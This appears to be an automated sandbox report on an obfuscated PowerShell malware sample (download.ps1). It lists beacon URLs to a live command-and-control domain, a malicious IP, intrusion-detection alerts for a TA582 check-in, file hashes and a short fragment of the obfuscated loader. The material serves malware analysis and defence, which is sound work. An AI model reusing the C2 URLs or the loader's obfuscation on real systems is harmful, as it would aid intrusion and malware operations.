      http://kcehmenjdibnmni.top/trzyoqslw6htr.php?id=user-PC&key=43809224344&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24B02000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://0.google.com/powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.microsoft&powershell.exe, 00000000.00000002.1796525489.0000022F3AAE0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/powershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.google.compowershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://apis.google.compowershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1757938142.0000022F22791000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://kcehmenjdibnmni.toppowershell.exe, 00000000.00000002.1757938142.0000022F23C6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1787542760.0000022F3296E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.1787542760.0000022F32805000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://0.googlepowershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://0.google.powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=527powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngXpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://0.google.com/powershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1757938142.0000022F229BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1757938142.0000022F24643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.1757938142.0000022F22791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1757938142.0000022F24113000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.pngpowershell.exe, 00000000.00000002.1757938142.0000022F23F6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1787542760.0000022F32A8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                142.250.185.164
                                                                                                		www.google.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                45.61.136.138
                                                                                                		kcehmenjdibnmni.topUnited States
                                                                                                		40676AS40676UStrue

                                                                                                General Information

                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1584337
                                                                                                Start date and time:2025-01-05 08:43:08 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 4m 25s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:7
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:download.ps1
                                                                                                Detection:MAL
                                                                                                Classification:mal76.evad.winPS1@2/7@2/2
                                                                                                EGA Information:Failed
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 14
                                                                                                • Number of non-executed functions: 3
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .ps1

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7356 because it is empty
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                02:44:02API Interceptor41x Sleep call for process: powershell.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kcehmenjdibnmni.top/sce6dujwmhhtr.php?id=computer&key=21283751447&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kcehmenjdibnmni.top/hlofm1brkshtr.php?id=user-PC&key=62803468549&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kcehmenjdibnmni.top/aoter2umlhhtr.php?id=computer&key=39417889290&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kcehmenjdibnmni.top/kqmlncu4i7htr.php?id=user-PC&key=66425560744&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kcehmenjdibnmni.top/r2wafo1tlyhtr.php?id=computer&key=85323043609&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kcehmenjdibnmni.top/mra3hxz5j7htr.php?id=user-PC&key=48227644320&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kdemjgebjimkanl.top/67wr8lha3ohtr.php?id=user-PC&key=72208797663&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kdemjgebjimkanl.top/4qai6vxy03htr.php?id=computer&key=89124909218&s=527
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                kcehmenjdibnmni.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                AS40676USFantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                • 41.216.189.243
                                                                                                armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                • 23.179.122.63
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                • 193.32.177.34
                                                                                                EwpsQzeky5.msiGet hashmaliciousUnknownBrowse
                                                                                                • 193.32.177.34
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138
                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                • 45.61.136.138

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:NlllulNg7/l/lZ:NllUy7/
                                                                                                MD5:C2537D289A7DB67172EF4C08F96CB120
                                                                                                SHA1:95114E0682CC761B86321F0DCC5CBE9A3E89DB21
                                                                                                SHA-256:26D1A27AED70765338B4BCFEDC7C23289CFDA9A984B1A55799FB89CFAE10C3C9
                                                                                                SHA-512:B991F49ECB907FA7CFCF6121BA004C1C5156A86F508E22B76FD1E53B21B7D6C4831EFF8EBCFB2CC9CB97E44DD578B276B734CB1D3CE96355E51C4578FB227603
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:@...e................................................@..........

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uyuariw.c0n.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ftl1fbsq.ix5.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0bqp4ui.2sc.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llsdcd1e.zwr.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7353141659838265
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:3q233CxH1YkvhkvCCtu3ENM4KHoaENM4KHoy:3q2yVEu3+Ra+Ry
                                                                                                MD5:9147E03E2BA785B9E06130576F468539
                                                                                                SHA1:CDE3A39093F90A14EDF9E2BEAC8542D870EFB96B
                                                                                                SHA-256:001871D8941B1B3112927AEF274FABCB5CEA90CA1604EE1AE3C6428A00F51C85
                                                                                                SHA-512:1054E5AD0E2139D575A4B575AA0DFFFA9FB60D989792AD063476C8581737A71276F6A5666A1971C8A33D915FD8AC1348A773115B939657E466220D93F6C3CD39
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....:..E_..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....,..E_....#.E_......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^%Zx=...........................%..A.p.p.D.a.t.a...B.V.1.....%Z{=..Roaming.@......CW.^%Z{=.............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^%Z.=....Q...........

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WGW2V0P3UC547SKYTW0C.temp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6221
                                                                                                Entropy (8bit):3.7353141659838265
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:3q233CxH1YkvhkvCCtu3ENM4KHoaENM4KHoy:3q2yVEu3+Ra+Ry
                                                                                                MD5:9147E03E2BA785B9E06130576F468539
                                                                                                SHA1:CDE3A39093F90A14EDF9E2BEAC8542D870EFB96B
                                                                                                SHA-256:001871D8941B1B3112927AEF274FABCB5CEA90CA1604EE1AE3C6428A00F51C85
                                                                                                SHA-512:1054E5AD0E2139D575A4B575AA0DFFFA9FB60D989792AD063476C8581737A71276F6A5666A1971C8A33D915FD8AC1348A773115B939657E466220D93F6C3CD39
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.".. ...-/.v.....:..E_..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....,..E_....#.E_......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^%Zx=...........................%..A.p.p.D.a.t.a...B.V.1.....%Z{=..Roaming.@......CW.^%Z{=.............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^%Z.=....Q...........

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:ASCII text, with very long lines (10921), with CRLF line terminators
                                                                                                Entropy (8bit):5.9430088555868075
                                                                                                TrID:
                                                                                                  File name:download.ps1
                                                                                                  File size:20'628 bytes
                                                                                                  MD5:99e9af1d265f8b0fc8e512e80f07d739
                                                                                                  SHA1:7433e52e040e3d3c71e5514064b49bbbb25ea7c7
                                                                                                  SHA256:aa7a1ee6564e0c793d61c6ab01555d316ca42bc71b7cf6c33a7cc66d5ccf48be
                                                                                                  SHA512:2319e42105edb7fffc3d5112fe3ee4c41eec1a3e6563b7f0ced91ef9bbc1a8fc23a463389e03457df2380584539e18b2e3219ffa480389296068030c22d732d2
                                                                                                  SSDEEP:384:tTcBKzKgVpRDtD5lFFFqBk/qV3aAiKpXuhhBJmeeVB6MAJXKd9NPxwZJckwzv:tUAKapbRF9qVKAi8WbweeVsMdPKnwD
                                                                                                  TLSH:BF926CC57788EDE042CDC32EA61AAD083F6A649DE1ABBFC0F4EA918373411456E59CC1
                                                                                                  File Content Preview:$witfxus=$executioncontext;$eriserisbealinesatreesalorbe = ([ChaR[]]@((-9485+(16032-6494)),(4320-(-4278+8546)),(8683-(872+7754)),(7762-(14935-7223)),(147168/(3106296/(-1077+2259))),(9056-9002),(2329-2273),(-4924+4979),(559405/10171),(6777-6727),(-334+390)

                                                                                                  File Icon

                                                                                                  Icon Hash:3270d6baae77db44

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-05T08:44:05.964108+01002859488ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.4617361.1.1.153UDP
                                                                                                  2025-01-05T08:44:07.183699+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.44973045.61.136.13880TCP
                                                                                                  2025-01-05T08:44:07.183699+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.44973045.61.136.13880TCP
                                                                                                  2025-01-05T08:44:07.821517+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.449731142.250.185.16480TCP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 5, 2025 08:44:06.496256113 CET4973080192.168.2.445.61.136.138
                                                                                                  Jan 5, 2025 08:44:06.501097918 CET804973045.61.136.138192.168.2.4
                                                                                                  Jan 5, 2025 08:44:06.501189947 CET4973080192.168.2.445.61.136.138
                                                                                                  Jan 5, 2025 08:44:06.505407095 CET4973080192.168.2.445.61.136.138
